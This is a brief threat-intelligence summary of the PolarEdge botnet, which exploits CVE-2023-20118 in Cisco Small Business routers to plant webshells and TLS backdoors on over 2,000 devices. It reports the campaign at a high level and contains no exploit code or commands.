Summary: The PolarEdge botnet, a complex IoT malware campaign targeting vulnerable Cisco Small Business Routers, has infected over 2,000 devices globally. This botnet exploits a critical vulnerability (CVE-2023-20118) to execute remote commands and deploy webshells for persistence. The sophistication of the botnet includes evasion techniques and a transition to secure communication, indicating an ongoing expansion of its operations since late 2023.
Affected: Cisco Small Business Routers and other edge devices
Keypoints :
- Discovered by Sekoiaβs Threat Detection & Research team, actively targeting Cisco routers.
- Exploits a RCE vulnerability (CVE-2023-20118) for unauthorized access.
- Utilizes advanced evasion techniques, including log deletion and encryption of command channels.
- Botnet has a significant global presence with over 2,000 infected devices, predominantly in the U.S.
- Transitioned to using TLS backdoor implants for secure and persistent control.
Source: https://securityonline.info/polaredge-botnet-2000-iot-devices-infected/